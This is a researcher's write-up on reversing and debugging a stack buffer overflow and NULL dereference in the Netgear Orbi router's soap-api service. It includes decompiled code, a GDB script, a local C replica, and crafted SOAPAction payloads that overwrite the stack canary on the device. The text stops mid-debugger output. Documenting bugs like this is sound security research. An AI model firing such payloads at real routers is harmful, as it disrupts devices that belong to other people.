orbi hunting 0x1: crashes in soap-api
- introduction
- first find: buffer overflow in SendSoapResponse()
- deep dive: SendSoapResponse()
- (failed) exploit attempt #1
- exploit viability, revisited
- stack canary bypass, question mark?
- conclusion
- references
introduction
The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http://<ROUTER>/soap/server_sa. I had originally discovered this endpoint early on when I started looking at this router, but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api. In fact, almost every request I sent to this endpoint caused a stack trace to be printed to the console. This seemed like a good enough place to start, so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.
Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.
background
The SOAP server parses the HTTP header SOAPAction on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi handles initial processing and passes it on to soap-api. The server sets environment variables that describe the request, which soap-api then reads in order to handle it.
The format of the SOAPAction header is:
- <urn:VENDOR:service:ACTION_str:1#METHOD_str
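To make the header format concrete, here is a minimal sketch in C of splitting a SOAPAction value into its action and method parts. The function name split_soap_action and the parsing strategy (find "service:", then the next ':' and the '#') are assumptions made for illustration; this is not the logic recovered from soap-api.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper (not taken from soap-api): split a SOAPAction value of
 * the form "urn:VENDOR:service:ACTION:1#METHOD" into ACTION and METHOD.
 * Returns 0 on success, -1 if the header is malformed or a part does not fit.
 */
int split_soap_action(const char *hdr,
                      char *action, size_t action_sz,
                      char *method, size_t method_sz)
{
    static const char marker[] = "service:";
    const char *a, *a_end, *m;
    size_t a_len, m_len;

    if (hdr == NULL || action == NULL || method == NULL)
        return -1;

    a = strstr(hdr, marker);          /* locate "service:ACTION:1#METHOD" */
    if (a == NULL)
        return -1;
    a += sizeof(marker) - 1;          /* skip past "service:" */

    a_end = strchr(a, ':');           /* ACTION ends at the next ':' */
    m = strchr(a, '#');               /* METHOD starts right after '#' */
    if (a_end == NULL || m == NULL || a_end > m)
        return -1;
    m++;

    a_len = (size_t)(a_end - a);
    m_len = strlen(m);
    if (a_len >= action_sz || m_len >= method_sz)
        return -1;                    /* refuse rather than truncate or overflow */

    memcpy(action, a, a_len);
    action[a_len] = '\0';
    memcpy(method, m, m_len + 1);     /* copies the terminating NUL too */
    return 0;
}
```

Called with "urn:NETGEAR-ROUTER:service:ConfigSync:1#Authenticate" and two sufficiently large buffers, this fills in "ConfigSync" and "Authenticate". Note that it rejects oversized parts up front, which is exactly the kind of length check the rest of this post is about.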
crash discovery
While doing some manual testing, starting from a known-good SOAPAction header value, I found that the server would send the following response when given a METHOD_str part that is 248 characters or longer, while simultaneously causing a crash dump to be printed to the console.
HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"></m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000
CPU: 3 PID: 26769 Comm: soap-api Tainted: P 3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211
pc : [<b6b52db4>] lr : [<b6b4ee88>] psr: 60000010
sp : befff398 ip : 7f5fce58 fp : 7f6026fc
r10: befff424 r9 : befff44c r8 : befff48c
r7 : befff54c r6 : befff400 r5 : 7f5d4594 r4 : 00000000
r3 : 00000000 r2 : 00000001 r1 : 00000000 r0 : 00000000
Flags: nZCv IRQs on FIQs on Mode USER_32 ISA ARM Segment user
Control: 10c5387d Table: 9785406a DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P 3.14.77 #1
[<c021ea68>] (unwind_backtrace) from [<c021bb60>] (show_stack+0x10/0x14)
[<c021bb60>] (show_stack) from [<c03b5518>] (dump_stack+0x78/0x98)
[<c03b5518>] (dump_stack) from [<c02234b0>] (__do_user_fault+0x74/0xbc)
[<c02234b0>] (__do_user_fault) from [<c022385c>] (do_page_fault+0x2f0/0x370)
[<c022385c>] (do_page_fault) from [<c02083dc>] (do_DataAbort+0x34/0x98)
[<c02083dc>] (do_DataAbort) from [<c02096f4>] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0: 00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff
Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone, as the stack trace only shows the top of the call stack: the chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api up in Ghidra, find where the SOAPAction header was being parsed, and trace it through the application, looking for places where it could overflow a buffer.
first find: buffer overflow in SendSoapResponse()
After digging through functions in the binary for a while and looking for strings that looked familiar or related to the output I was getting from the server, I found the following piece of code in the function at 0x0003e82c.
From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.
The overflow occurs on line 48 in the decompiled code shown above as a result of the call to sscanf(). This line parses the SOAP method section from the server response content (<m:AAAAA[...]Response) and writes it to the buffer auStack236, a fixed-size 64-byte buffer on the stack, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.
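As a small illustration of why this call is dangerous: %s in a scanf format has no built-in length limit and keeps reading until it hits whitespace, so the literal "Response" in the format never gets a chance to stop it. The sketch below shows a bounded variant of the same parse. The function name parse_method_bounded and the METHOD_BUF_SZ constant are assumptions for illustration; only the 64-byte size comes from the decompiled code.

```c
#include <stdio.h>
#include <string.h>

#define METHOD_BUF_SZ 64   /* size of the destination buffer described above */

/*
 * Hypothetical bounded variant of the first sscanf() call. "%63s" stops after
 * 63 characters (plus the NUL), so the copy can never exceed METHOD_BUF_SZ.
 * Just like plain %s, it swallows the trailing "Response" as well, which is
 * stripped afterwards. Returns 0 on success, -1 if nothing was parsed.
 */
int parse_method_bounded(const char *resp, char out[METHOD_BUF_SZ])
{
    char *suffix;

    if (resp == NULL)
        return -1;
    out[0] = '\0';
    if (sscanf(resp, "<m:%63s", out) != 1)
        return -1;

    suffix = strstr(out, "Response");
    if (suffix != NULL)
        *suffix = '\0';
    return 0;
}
```

Feeding this a response that starts with "<m:LoginResponse " yields "Login", while a method made of hundreds of A's is cut off at 63 characters instead of running past the end of the buffer.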
After reading through the code some more I realized almost every request eventually led to SendSoapResponse() (I mean, duh, right?). In general, the flow always goes a little something like this:
- main()
  - takes care of getting the SOAPAction header from an environment variable, SOAP_ACTION or HTTP_SOAPACTION (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))
  - handles parsing of the SOAP action and SOAP method parts from the header
  - saves pointers to the start of each section in the buffer/PTR returned by getenv()
  - these ptrs are passed to SoapExecute()
- SoapExecute()
  - The main function that actually does handling of the various SOAP actions and methods
  - Handles authentication checks
  - Calls appropriate functions/etc based on submitted actions / method
  - at the end of pretty much every case, it calls SendSoapRespCode(), passing the soap_action and soap_method pointers as arguments
- SendSoapRespCode()
  - Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was Authenticate or not
  - The HTML/XML blob is then passed on to SendSoapResponse() along with the SOAPAction header value
- SendSoapResponse()
  - Here the final response content is finalized and sent to the client
live debugging
At this point I felt pretty confident I was crashing soap-api through this buffer overflow, so I was eager to see whether the bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc.), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api, I would have to debug on the device itself. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.
For each request that accesses SOAP functionality, lighttpd forks and (something) eventually executes soap-api to handle the request. I initially had some trouble getting the debugger to catch soap-api when it was spawned and stay attached while other forks were created in the background, but I eventually found a sequence of gdb commands that allowed me to catch soap-api early and then tell gdb to stay attached.
These were:
- create break on main()
- set follow-fork-mode child
- continue
- after sending a request, lighttpd forks and gdb attaches to soap-api and breaks on main()
- set follow-fork-mode parent (to prevent new forks from taking over)
- continue
This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces, and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote a GDB script to set everything up, insert a breakpoint on sscanf(), and catch signal 11. Each time the sscanf breakpoint is hit we print a backtrace, frame info, registers, and 10 words starting at the current stack pointer; on a segfault we print the backtrace, frame info, and registers.
set width 0
set height 0
set verbose off
set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end
break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end
catch signal 11
commands 3
bt full
i frame
i registers
end
continue
lolwut: a null dereference
With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:
This output seemed to indicate that:
- The crash was happening in strcmp in libc.so.1
- The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register r0, which is 0 at the time of the crash
deep dive: SendSoapResponse()
At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the crash. I tried different payload lengths and values to see if they caused anything other than a null pointer dereference but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line by line to try to understand what was happening.
how the payload reaches SendSoapResponse()
The SOAP action and method strings are initially parsed from the SOAPAction HTTP header in main() and are passed as arguments to the other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode(). The code snippet below shows how the SOAP body string is constructed:
char resp[512];
char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
snprintf(resp, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);
Assuming a method “METHOD”, action “ACTION”, and response code 404, the resulting string would be:
<m:METHODResponse xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1"></m:METHODResponse>
<ResponseCode>404</ResponseCode>
snprintf() will write at most 512 bytes (including the terminating NUL), but that limit can be reached within the first string it inserts if that string is long enough, in which case no further formatting happens and the rest of the output is truncated. For example, submitting a method string containing 500 A’s results in the following string:
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse
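The truncation is easy to reproduce in isolation. The sketch below rebuilds the response with the same format string and reports whether the "service:" marker survives for a given method length. The helper name service_survives and the fixed action "x" are assumptions for illustration, and this only models the snprintf() step, not anything that happens to resp afterwards.

```c
#include <stdio.h>
#include <string.h>

#define RESP_SZ 512

/*
 * Rebuild the response body the way the snippet above does, using a method
 * string made of `method_len` 'A' characters. Returns 1 if "service:" is
 * still present in the (possibly truncated) result, 0 if it is not.
 * The helper name and the fixed action "x" are illustrative assumptions.
 */
int service_survives(size_t method_len)
{
    static const char fmt[] =
        "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\">"
        "</m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
    char method[1024];
    char resp[RESP_SZ];

    if (method_len >= sizeof(method))
        method_len = sizeof(method) - 1;
    memset(method, 'A', method_len);
    method[method_len] = '\0';

    /* snprintf() writes at most RESP_SZ bytes, including the final NUL. */
    snprintf(resp, sizeof(resp), fmt, method, "x", method, 404);

    return strstr(resp, "service:") != NULL;
}
```

By my count of the fixed text in this format string, the marker still fits for a 463-character method and is cut off at 464, so service_survives(463) should return 1 and service_survives(464) should return 0.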
code breakdown
The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.
Ghidra decompiler output:
/*1*/ if (is_soap_login == 1) {
/*2*/ local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/ fprintf(stream,
/*4*/ "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nServer: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/ ,total_content_len,local_jwt_ptr);
/*6*/ }
/*7*/ else {
/*8*/ fprintf(stream,
/*9*/ "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nServer: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/ ,total_content_len);
/*11*/ }
/*12*/ soap_log(2,
/*13*/ "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nServer: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/ ,total_content_len);
/*15*/ fputs(s_<?xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/ fputs(resp,stream);
/*17*/ fputs(s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc,stream);
/*18*/ soap_log(0,"%s%s%s",s_<?xml_version="1.0"_encoding="UT_000bd624,resp,
/*19*/ s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc);
/*20*/ fflush(stream);
/*21*/ if ((ext_mode == 0) &&
/*22*/ (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/ /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/ */
/*25*/ sscanf(resp,"<m:%sResponse%*s",method_response_buf);
/*26*/ strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/ if (strstr_Response_ret != (char *)0x0) {
/*28*/ *strstr_Response_ret = '\0';
/*29*/ }
/*30*/ /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/ ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/ sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/ ptr_to_substrings_found = (char *)strstr_wrapper(resp,"<ResponseCode>");
/*34*/ if (ptr_to_substrings_found != (char *)0x0) {
/*35*/ sscanf(ptr_to_substrings_found,"<ResponseCode>%[^<]",&local_114);
/*36*/ }
/*37*/ vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/ execve_wrapper_maybe
/*39*/ ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/ combined_action_method_str,&local_114,0);
/*41*/ FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/ }
- Arguments:
  - FILE *stream: filestream where response will be written (socket back to client?)
  - char *resp: a 512 byte buffer containing the body of the XML SOAP response constructed by the calling function (SendSoapRespCode)
- Lines 1-20 in the snippet handle constructing and sending the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
  - note: this is why the response is always sent, no matter what happens afterwards
- Line 25: a call to sscanf to attempt to parse the SOAP method string
  - other functions up the call stack have parsed and placed the method string into an XML component in the resp argument passed to SendSoapResponse
  - sscanf searches for the pattern <m:*Response* and will parse the content between the colon up to the end of ‘Response’
  - method_response_buf is a fixed-size 64 byte buffer
  - it’s possible to overflow this buffer if the string between <m: and Response* is greater than 64 bytes, which appears to be possible to do
- Line 26: a call to a strstr wrapper to check for the presence of the string “Response” in the data that was read into method_response_buf by sscanf
  - this wrapper first checks to make sure neither of the two arguments passed to it is NULL
  - if either of them is, it doesn’t call strstr and just returns a NULL pointer
  - if they’re not, it calls strstr and then returns whatever strstr returned; strstr also returns NULL if the string is not found
  - If the submitted SOAP method has pushed the Response string entirely off of the XML buffer that is constructed, this would return NULL
- Lines 27-29: if the call to strstr did NOT return NULL (the Response string was found), set the value at the first char of Response to NULL
  - This null terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NULL and the Response part is truncated
- Line 31: another call to the strstr wrapper, this time checking the resp argument containing the XML constructed by the calling function for the string "service:"
  - there is no check after this to see if this returned NULL
- Line 32: second call to sscanf that attempts to parse the SOAP action string from the pattern "service:*:", this time using the value returned by the call to strstr on the previous line as its source
  - since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
  - this only happens when the method string was sufficiently long to have pushed the "service:*:" string off of the XML body buffer resp
- Line 33: third call to the strstr wrapper, this time searching for the string "<ResponseCode>" in resp
- Lines 34-36: if the string was found by the call to strstr on the previous line, sscanf is used to parse out a substring similar to previous calls; otherwise this is just skipped.
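The wrapper described in the breakdown above is small enough to sketch directly. This is a reconstruction from the description in this post, not code lifted from the binary, and strstr_wrapper is just the label I gave it while reversing.

```c
#include <stddef.h>
#include <string.h>

/*
 * Sketch of the strstr wrapper as described above (the name is a label from
 * reversing, not a symbol from the binary): return NULL when either argument
 * is NULL, otherwise defer to strstr().
 */
char *strstr_wrapper(const char *haystack, const char *needle)
{
    if (haystack == NULL || needle == NULL)
        return NULL;
    return strstr(haystack, needle);
}
```

The important detail is that there are two distinct ways to get NULL back: a NULL argument, or a needle that simply is not in the haystack. Any caller that passes the result straight into another string function, as the code on line 32 does, has to handle both.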
takeaways
After going through the code, I knew the following:
- It is possible to overflow method_response_buf, which the first call to sscanf() writes the method string to.
- It is possible to overflow service_action_buf, which the second call to sscanf() writes the action string to.
- A NULL dereference will occur in the second call to sscanf if the string 'service:' is not found in resp.
  - This will occur if the method string submitted is long enough to cause the SOAP action portion (service:) to be truncated from the final response data in resp
Knowing this, it was clear why the payloads I was sending were causing the null dereference: the method strings were long enough to have caused the 'service:' string to be truncated from the end of resp, so the strstr() call that checks for it returned a null pointer, which was then passed to sscanf() without being checked first.
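For contrast, here is a minimal sketch of what the second parse could look like with both problems addressed: the strstr() result is checked before use, and the sscanf() conversion carries a width. The function name parse_action_checked is hypothetical, and the 32-byte size is an assumption borrowed from the action_buf in the local replica later in this post, not a value confirmed from the binary.

```c
#include <stdio.h>
#include <string.h>

#define ACTION_BUF_SZ 32   /* assumed size for service_action_buf */

/*
 * Hypothetical guarded version of the "service:" parse. Returns 0 and fills
 * `out` on success, -1 if the marker is missing or no action could be read.
 */
int parse_action_checked(const char *resp, char out[ACTION_BUF_SZ])
{
    const char *p;

    if (resp == NULL)
        return -1;
    out[0] = '\0';

    p = strstr(resp, "service:");
    if (p == NULL)
        return -1;                   /* the check the original code lacks */

    /* "%31[^:]" copies at most 31 non-':' characters plus the NUL. */
    if (sscanf(p, "service:%31[^:]", out) != 1)
        return -1;
    return 0;
}
```

With a truncated body such as "<m:AAAA" this returns -1 instead of handing a NULL pointer to sscanf(), and an overly long action is clipped at 31 characters.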
(failed) exploit attempt #1
The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:
- the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
- the final contents of resp must include the string 'service:'
With this in mind, I went back and spent some time trying payloads I thought would avoid triggering the null dereference, but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for the service string would be passed. I had tried putting it at both the beginning and the end of the payload string, but this still caused the null deref every time. I had been looking at this bug for a few days at this point and was pretty exhausted, so I called it there and concluded that even though the buffer overflow was there, it was ‘unreachable’ due to the (incorrect) constraints I had in mind at the time. Honestly, I was just relieved to be done with it.
exploit viability, revisited
As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later, and found a way to do it! In fact, it happened while I was in the process of writing the first part of this post, which I was basically going to end with the section before this one, saying there was no way to get around the null dereference. While I was reading through my notes, trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions about the constraints and about the behavior of sscanf(). I’ve corrected those mistakes in the code breakdown above in the interest of clarity. Anyway, I updated my mental model of the bug.
With a new understanding of the constraints, I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf while avoiding the NULL dereference caused by failing the check for "service:". Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 and 2.7.33.
From the GPL archive (soap-api is part of the net-cgi package):
./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector
local testing
In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int replica (FILE *stream, char *resp) {
// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
int content_len;
char* jwt;
char *var2;
char *var3;
char *var4;
char method_buf[64];
char action_buf[32];
char combined_action_method[128];
char *undef1;
char *undef2;
int stack_check_val;
printf("resp: %s\n", resp);
// fake stack canary
stack_check_val = 0x313373;
printf("[+] stack check start: 0x%x\n", stack_check_val);
// null the buffers
memset(method_buf, 0, 64);
memset(action_buf, 0, 32);
memset(combined_action_method, 0, 128);
// call sscanf - 1: parse the Method portion from the xml blob in resp
// and save it to method buf (format is '<m:METHODResponse*'). there is a buffer overflow
// here if the parsed string is greater than 64 bytes
printf("[+] sscanf call 1: parse method portion from resp\n");
sscanf(resp, "<m:%sResponse%*s", method_buf);
// this would check to confirm that the expected pattern/str was parsed (should still
// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
// fail this check.
var2 = strstr(method_buf, "Response");
// but it doesn't really matter because it's only to see if
if (var2 != (char *)0x0) {
printf("[+] found 'Response' in method_buf, NULLED\n");
*var2 = 0x0;
}
// ========= Second call to sscanf() and NULL check fail ===========
// search for service string in resp, no NULL check
// a long enough METHOD would result in this being truncated, causing strstr
// to return a NULL pointer
printf("[+] strstr call 1: check for 'service:' in resp\n");
var3 = (char *)strstr(resp, "service:");
// DEBUG -- show when we fail this check
if (var3 == (char *)0x0) {
printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
printf("resp: %s\n", resp);
}
printf("[+] sscanf call 2: parse ACTION portion from resp\n");
sscanf(var3, "service:%[^:]", action_buf);
// check for <ResponseCode> in resp
printf("[+] strstr call 2: check for '<ResponseCode>' in resp\n");
var3 = (char *)strstr(resp, "<ResponseCode>");
if (var3 != (char *)0x0) {
// if its there, parse some stuff from it (not important right now)
printf("[+] found <ResponseCode>, passed check\n");
undef1 = 0;
}
// check if the stack check int was overwritten
printf("[+] stack check end: 0x%x\n", stack_check_val);
return 0;
}
int main(int argc, char *argv[]) {
// args to pass to target func (replicating original)
FILE *streams = 0;
// this will hold the payload (i.e. the Method portion we would submit)
// read from env to make testing easier
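char *payload = getenv("PAYLOAD");
if (payload == NULL) {
fprintf(stderr, "[!] set the PAYLOAD environment variable first\n");
return 1;
}
printf("[+] payload length: %zu\n", strlen(payload));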
// construct the response content the same way the server does in SendSoapRespCode()
char resp_b[512];
memset(resp_b, 0, 512);
// this is the fmt string the calling function uses to construct resp
char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);
// call the target function with the payload
printf("[+] calling target function...\n\n");
replica(streams, resp_b);
return 0;
}
I experimented with various payloads using this code, and this is when I made a new discovery: different payloads would cause resp to be corrupted in different ways, which would sometimes result in resp containing the ‘service:’ string before the first call to sscanf() but not after. The output below shows this happening with a payload that one would assume would definitely pass the string check:
-> % ./replica2
[+] payload length: 130
[+] calling target function...
resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m="urn:NETGEAR-ROUTER:service:ConfigSync:1"></m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response>
<ResponseCode>404</ResponseCode>
[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1] 221258 segmentation fault (core dumped) ./replica2
After some trial and error I eventually found a payload that would successfully overflow method_buf, avoid the null deref, and overwrite the simulated stack canary:
-> % ./replica2
[+] payload length: 2450
[+] calling target function...
resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se
[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '<ResponseCode>' in resp
[+] stack check end: 0x63697672
[1] 221814 segmentation fault (core dumped) ./replica2
Nice!
now, against the device
With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.
"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"
I modified the GDB script I had been using to break on __stack_chk_fail() instead of sscanf() to confirm, and saw this in the output:
Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.
I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:
"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"
Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0 0x0 0
r1 0xb6f01b65 3069188965
r2 0x42424242 1111638594
r3 0x5719b01e 1461301278
r4 0x0 0
r5 0xb6a39214 3064173076
r6 0xb6f2bb80 3069361024
r7 0xbe88e4cc 3196642508
r8 0xbe88e40c 3196642316
r9 0xbe88e3cc 3196642252
